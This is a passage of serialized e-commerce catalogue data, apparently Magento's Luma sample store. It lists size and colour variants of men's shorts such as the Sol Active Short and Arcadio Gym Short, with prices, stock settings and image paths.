:\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Purple\"},\"949\":{\"sku\":\"MSH10-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-34-Blue\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"950\":{\"sku\":\"MSH10-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-34-Green\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"951\":{\"sku\":\"MSH10-34-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-34-Purple\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-34-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Purple\"},\"952\":{\"sku\":\"MSH10-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-36-Blue\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"953\":{\"sku\":\"MSH10-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-36-Green\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"954\":{\"sku\":\"MSH10-36-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short-36-Purple\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sol-active-short-36-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Purple\"},\"955\":{\"sku\":\"MSH10\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Sol Active Short\",\"description\":\"<p>You\'ll let your fear go and push your limits in your new Sol Active Short. Featuring ultra-breathable performance fabric and a flat comfort-fit waistband, the Sol Active Short is perfect for high-intensity circuits or high-heat bikram.<\\/p>\\n<p>&bull; Light blue jersey shorts with mesh detail.<br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Machine wash cold, tumble dry low.<br \\/>&bull; Superior performance fabric.<br \\/>&bull; Flat-lock seams.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=Lycra&reg;|Spandex,pattern=Solid,climate=Indoor|Hot|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH10-32-Blue,size=32,color=Blue|sku=MSH10-32-Green,size=32,color=Green|sku=MSH10-32-Purple,size=32,color=Purple|sku=MSH10-33-Blue,size=33,color=Blue|sku=MSH10-33-Green,size=33,color=Green|sku=MSH10-33-Purple,size=33,color=Purple|sku=MSH10-34-Blue,size=34,color=Blue|sku=MSH10-34-Green,size=34,color=Green|sku=MSH10-34-Purple,size=34,color=Purple|sku=MSH10-36-Blue,size=36,color=Blue|sku=MSH10-36-Green,size=36,color=Green|sku=MSH10-36-Purple,size=36,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh10-blue_alt1.jpg,\\/m\\/s\\/msh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"Lycra&reg;|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"956\":{\"sku\":\"MSH11-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-32-Black\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":